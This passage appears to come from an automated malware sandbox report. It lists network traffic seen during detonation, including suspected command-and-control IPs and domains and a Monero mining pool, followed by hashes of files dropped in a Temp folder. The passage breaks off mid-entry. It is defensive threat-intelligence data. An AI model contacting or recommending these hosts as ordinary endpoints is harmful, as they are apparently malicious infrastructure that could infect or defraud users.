| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| KZ | 2.134.250.184:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AO | 102.130.192.212:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| UZ | 93.188.86.208:40500 | udp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| IR | 2.176.112.82:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| UZ | 86.62.3.67:40500 | udp | |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| EG | 102.189.164.188:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| US | 8.8.8.8:53 | down.mvip8.ru | udp |
| US | 172.67.130.102:80 | down.mvip8.ru | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| UZ | 93.188.86.253:40500 | udp | |
| NL | 85.31.47.154:80 | win-network-checker.cc | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | cxlugg.sbs | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| KZ | 95.59.165.102:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | downsexv.com | udp |
| US | 172.67.189.30:80 | downsexv.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | pb.agnt.ru | udp |
| RU | 45.90.34.133:443 | pb.agnt.ru | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| IR | 151.247.143.25:40500 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| US | 8.8.8.8:53 | up.maolaoban.top | udp |
| FI | 37.27.43.98:443 | 37.27.43.98 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AO | 102.219.187.80:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 185.232.59.135:80 | up.maolaoban.top | tcp |
| US | 8.8.8.8:53 | lol.7hacks.click | udp |
| US | 198.54.115.219:443 | lol.7hacks.click | tcp |
| US | 8.8.8.8:53 | c1.5yyz.com | udp |
| CN | 123.184.58.35:80 | c1.5yyz.com | tcp |
| US | 8.8.8.8:53 | HITROL-60505.portmap.host | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.186.84.81:40500 | udp | |
| PL | 185.16.38.41:2034 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| RU | 31.23.95.118:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| PL | 185.16.38.41:2024 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 85.185.237.83:40500 | udp | |
| RU | 185.215.113.26:80 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | home.sevkk17pn.top | udp |
| US | 8.8.8.8:53 | c2.5yyz.com | udp |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| KZ | 178.91.130.114:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.176.119.113:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AO | 129.122.232.67:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | apps.game.qq.com | udp |
| HK | 43.129.139.164:80 | apps.game.qq.com | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 123.184.58.35:80 | c1.5yyz.com | tcp |
| KZ | 2.132.15.134:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| SY | 77.44.131.125:40500 | udp | |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| SY | 178.253.102.214:40500 | udp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| CN | 113.65.5.223:8283 | c2.5yyz.com | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 90.156.166.108:40500 | udp | |
| EG | 197.121.126.87:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 91.185.130.166:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| N/A | 127.0.0.1:51160 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | UmLcmUHSTT.UmLcmUHSTT | udp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| MX | 189.167.57.71:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| UZ | 185.203.237.215:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| RU | 194.87.248.37:1912 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| BG | 195.230.23.72:80 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.187.42.28:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| RU | 194.87.248.37:1912 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 90.156.160.6:40500 | tcp | |
| KZ | 31.169.15.229:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| IR | 2.189.31.47:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| FR | 141.94.96.71:3333 | pool.supportxmr.com | tcp |
| US | 96.248.52.125:8031 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| KZ | 31.171.185.170:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| US | 8.8.8.8:53 | fender-shop.online | udp |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| IR | 46.248.37.226:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| MX | 189.150.7.25:40500 | udp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.59.171.222:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 212.120.203.199:40500 | udp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| IR | 2.177.150.123:40500 | udp | |
| RU | 185.215.113.67:27667 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| IR | 2.187.40.5:40500 | udp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| KZ | 178.90.200.255:40500 | tcp | |
| US | 198.163.193.223:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 8.8.8.8:53 | amenstilo.website | udp |
| AT | 77.73.131.68:6969 | tcp | |
| UZ | 90.156.161.82:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| UZ | 90.156.163.33:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 96.248.52.125:8031 | tcp | |
| UZ | 146.120.17.117:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 212.120.203.199:40500 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| IR | 2.185.39.132:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 95.58.74.111:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| EG | 45.242.17.111:40500 | udp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| BG | 195.230.23.72:80 | tcp | |
| UZ | 89.236.217.71:40500 | udp | |
| US | 96.248.52.125:8031 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 185.208.159.121:80 | 185.208.159.121 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | bitkiselurunsiparis.com | udp |
| TR | 94.73.144.130:443 | bitkiselurunsiparis.com | tcp |
| RU | 178.206.158.183:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 5.219.134.102:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 5.239.147.239:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| CN | 183.57.21.131:8095 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 8.8.8.8:53 | liveos.zapto.org | udp |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| YE | 134.35.158.149:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| N/A | 127.0.0.1:51989 | tcp | |
| N/A | 127.0.0.1:52000 | tcp | |
| N/A | 127.0.0.1:52009 | tcp | |
| N/A | 127.0.0.1:52011 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| US | 192.210.150.26:8787 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| UZ | 90.156.162.48:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| IR | 5.234.140.118:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| EG | 45.242.104.231:40500 | udp | |
| NL | 45.66.231.214:9932 | tcp | |
| AT | 77.73.131.68:6969 | tcp | |
| CN | 123.60.37.61:9999 | tcp | |
| IR | 94.183.35.46:40500 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 213.206.44.35:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| IR | 5.239.109.92:40500 | udp | |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | fieldtrollyeowskwe.shop | udp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 5.181.202.246:443 | fender-shop.online | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| AO | 154.71.253.54:40500 | udp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| FI | 95.216.107.53:12311 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| FI | 95.216.107.53:12311 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 96.248.52.125:8031 | tcp | |
| KZ | 92.47.52.79:40500 | udp | |
| NL | 194.26.192.138:2404 | liveos.zapto.org | tcp |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| NL | 45.66.231.214:9932 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| RU | 194.87.248.37:1912 | tcp | |
| RU | 31.8.228.20:40500 | tcp | |
| UZ | 90.156.160.86:40500 | udp | |
| FI | 95.216.107.53:12311 | tcp | |
| RU | 185.215.113.67:27667 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| GB | 91.238.160.241:443 | jtpdev.co.uk | tcp |
| AT | 77.73.131.68:6969 | tcp | |
| DE | 193.161.193.99:60505 | HITROL-60505.portmap.host | tcp |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | www.clubedasluluzinhasro.com.br | udp |
| US | 67.23.238.117:443 | www.clubedasluluzinhasro.com.br | tcp |
| RU | 194.87.248.37:1912 | tcp | |
| US | 8.8.8.8:53 | fnback9636.site | udp |
| AT | 77.73.131.68:6969 | tcp | |
| US | 8.8.8.8:53 | tvexv20vt.top | udp |
| UZ | 90.156.166.42:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.26:80 | tcp | |
Files
C:\Users\Admin\AppData\Local\Temp\Man
| MD5 | 942921a0f4451cef3181a271aa5aa5d8 |
| SHA1 | b6806440237dec901902e17e98ddd44901e690cf |
| SHA256 | 91155b613b4051201e35f5fe14c25838a296998a71d35840247a687464104002 |
| SHA512 | 21140feec8c3e1ee530d788872e16fbb0c91a4fc2ababc6b077f73934b7ccbdcba1c514be8251f3aa3037d8e072083ba6db069f68b94b22caef1595d65492449 |
C:\Users\Admin\AppData\Local\Temp\Motorcycles
| MD5 | 12baeab7b6db063621667975ac0051ad |
| SHA1 | 07d2ad1ff473249709f5a673e7fd1ae3dcfff11d |
| SHA256 | ba324d79ad346e64f8f487ceae49f46c86efde7b11346c88ee106ef0e2225bd4 |
| SHA512 | b41c9b8ed43009feb710cf19adfea396dab7863ed27b4a7801713f3b80ebb0cc61743eed0151ec302fe843667f350c725dedfb2eaeb4988edf89aba574af324a |
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
| MD5 | b06e67f9767e5023892d9698703ad098 |
| SHA1 | acc07666f4c1d4461d3e1c263cf6a194a8dd1544 |
| SHA256 | 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb |
| SHA512 | 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943 |
C:\Users\Admin\AppData\Local\Temp\768318\B
| MD5 | 91360b959a47c0dbdf919b897be92d05 |
| SHA1 | ccf46fe589b5938596e943c1221edef7034939aa |
| SHA256 | 1d85ce3a2092575ff63c08adaf1ff3781d876971268235f2fa1589eb058a93b9 |
| SHA512 | 85b276e347c07471720edf93d8e4719affc895423def3a10e3ff85f567146763c55b9cb49573b65c0379d0054c59dad08337e1b30f7e0e859b7ddcdf115c9f69 |
C:\Users\Admin\AppData\Local\Temp\Absence
| MD5 | 2734ad34783a6db16f6b94bbd09cd493 |
| SHA1 | 09ac49277fc4f0793d98883c4002b206a3fe7c73 |
| SHA256 | 6b86ae877d6631b01b0fcddcd9e33789935028334dcb85b52d6dbc6029cafdd4 |
| SHA512 | 1064e6302db45b4209decea11279b98f49c142f617c4b89d656c616455b838f0e176b509bc9ed59aa1a301728c3ba0dc9a18820ae707e75a530bba43847e659c |
memory/868-588-0x0000000000780000-0x0000000000EBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Betting
| MD5 | bd2844fe4dd38884d74ce728f2400cb5 |
| SHA1 | ad233ac1751012160d9c27ed738d483bff84d3ac |
| SHA256 | a95ab02b4fbb805a8f6705db6621dec8654f63f7bd47bfdf7ffe054d071458b3 |
| SHA512 | 0563783d86e677de6f835115c85bdc79840ac074d7fb63c5c01a8982ec70ee4ade54a1496b82f7c8425d3e3e9cf22de109075e42931d703c2d38c10f9d6a51dd |
C:\Users\Admin\AppData\Local\Temp\Trick
| MD5 | 09272275fc331864d715c5fd7f516ef4 |
| SHA1 | 696228d9919bfbf7f57095a0582ea84a4c8b2463 |
| SHA256 | da2b76fce5037806a551f2c3019b9a2f98013c25a70335207bbaec03d6e6d79b |
| SHA512 | 4b2d8e30e0d649f4a97b40c63a8968925c79ddd3e63950dae8859b829144c871fae76328c0b42f6ea31a554c1d3ffee038b2cd3b61d510f52f8d743b39784be5 |
C:\Users\Admin\AppData\Local\Temp\Plumbing
| MD5 | 88903415cfaefe07c79b4bc62811f77a |
| SHA1 | 80af7a145187c4ed1bb4f39235137e79bf9e146c |
| SHA256 | 54cb781d3e096bf98be54f1c4cf9a6bcfb13f231e5cbd318f9a827e5fca48e46 |
| SHA512 | 66cb226e847001ff81a32e7245ffe371f1b1132fa05d6c781aef211f7f208395424a41d28943d577e9b2eac68b863e1a68ff34ebc320195a4dd77e29f4508fcb |
C:\Users\Admin\AppData\Local\Temp\Zdnet
| MD5 | 5018d665922fa16761ffa5fa7e905632 |
| SHA1 | 55f189f02b0b457576a588fcb037a1d3c47ae71f |
| SHA256 | c5bd293efab53297e0bd3a52c473e34a84131d5fa4a8dcaac48f768f595c8c8e |
| SHA512 | 6f45f5a536665380c76621c72408452939a47e2c5316c18c0a002135fd25cc3f8e454fd7077f3e40b81b5c07c009b83e58c07e05c43e06a7bcd34a430275836e |
C:\Users\Admin\AppData\Local\Temp\Payable
| MD5 | 3adbd62741644329b4b67bfa83ad0069 |
| SHA1 | 27d8611b4faa6b61ce2b84d6ea5436a5c9a25b2b |
| SHA256 | ce24d74efb227c7ba606634a2afeedf78c23b5f5d47a9ef027b9821b1bf26911 |
| SHA512 | f5263a70707120610016c58f5b0c243ef1ba12fc8a67598da06961a894faf6773f22efc3e5c8a95400d78dc06e4f87f3f176973256817bae1333062873e127c1 |
C:\Users\Admin\AppData\Local\Temp\Yarn
| MD5 | e4ca1366fdf3dc43f29f5e0c70fcbd02 |
| SHA1 | dcca148c560895228107ef030893de6e49405c03 |
| SHA256 | 8486535c0bf8d8e1f473ce36ca0e05aac8c29176270ea626370e4be08b288c5e |
| SHA512 | 476a9e3a35db2d197a5c29addb83b3014e8413f2685fdcd52d5ba9455cf87f8431291a10a28d55707af0040550aaa406903eb3ddf5ea611aa8eb0bfee2b7a48b |
C:\Users\Admin\AppData\Local\Temp\Mba
| MD5 | 889909377b1319977eec54a9f3d37901 |
| SHA1 | eec6b8bb8514b40cad848333d0df38bceba592bd |
| SHA256 | 8397edffbb6f8986482143770ea4529fbf9dc003cd8b17e67a033f91f47cb722 |
| SHA512 | 782398c80f45bd397141131a1f32d197cbb0d856af0d86ae29791f40ab028b77153fc52b32de1c971e978aafa9272009dc9c1fe49c67f9ba8152de9f4c0b7356 |
C:\Users\Admin\AppData\Local\Temp\California
| MD5 | 232174f65130b34ecf911ab7ae25ff15 |
| SHA1 | 10e6b5d1b9271be0faefad86f11b71b3b504e1c9 |
| SHA256 | 53a8163582cd2bffa7d4b8073b073d25543a4136e52510c9c1ab39341fd98934 |
| SHA512 | 03e5fda53609e7a729fa32d85c535e862edd989e1d15163ad65c583a0c988430ba2d17683063224127dae27ac649bbdf2191c075fcbd33f43e60b65d013519a3 |
C:\Users\Admin\AppData\Local\Temp\Teachers
| MD5 | cc7e07f5137fc0ab4f51d13a08bd86ad |
| SHA1 | a2079587ff9f2e077ff3ed65dac0e7e29fa7d774 |
| SHA256 | 053eb0abd3f22ad1acf0a4e9410d7da52827134299fe847599b9544f0e8ed5cf |
| SHA512 | a6278e42b37badf398e5fb7beb7516c69b32be0516529352da2b50085696e6c87d082ade6f29cde24a6351e497d57a34d4e9b2d6e83e92affd4fdfd9a01575ed |
C:\Users\Admin\AppData\Local\Temp\Diy
| MD5 | a7391e7a4186b6738ee0a78d5b389b2c |
| SHA1 | f55591df5af2c5b3cae87626a2036026d7d5ded2 |
| SHA256 | b401cb10c896b70a39117a37f053ace79b399a8048a75514382803191f461add |
| SHA512 | 2aa54ba2eb6e48c4fa97037c7fd825f3feb57dcd57b603588e6ce850d515d95ba3891e23fc005b1a3909f2cd7627b93551b44cb2c996c2bc7f9f11ec7f29d630 |
C:\Users\Admin\AppData\Local\Temp\Challenged
| MD5 | 97a59eee191e4dab476dfa6d26593950 |
| SHA1 | e6dcf9cdfef793feb48a95b12fcded3b2dc2b237 |
| SHA256 | c681b5e5d4a2c0ff5af4d1da52564b08f8fbd445fdb8df14d173a76e28705403 |
| SHA512 | ce425860334c2b7795d3f62209ef90b35eeb5377e407101975140d498e8373f071817ed099f910b6a77d11d2d92992e12cf99a8a9c57a13531e99c5a95491c6a |
C:\Users\Admin\AppData\Local\Temp\Allergy
| MD5 | 0d070462ff547df5aab1c2bf9dc2b8c0 |
| SHA1 | e1107814d12b18cfd9c31f0d49aa7c486149bae8 |
| SHA256 | c5f42d082a4b27f89e1236e83e130977f272d4965b2a86e76838ac94cce3fb7d |
| SHA512 | c1b7fbb506cac3ecfe72dbd90933e277299dd9506dcaab84e92e57d18d66643ebae917d084f8419c6edf4689cb69c4e7fa65fd6c0a94fd989e911f272eb13f16 |
C:\Users\Admin\AppData\Local\Temp\Command
| MD5 | dbe23b0f4e61580eff0c7bc55ac7f549 |
| SHA1 | 9dfc8464163844231072a9311ec46dc6529ff6a8 |
| SHA256 | be9b14be61f7702621227f5342e46128a13fc04a57012e766e2683f3f8a4e7dd |
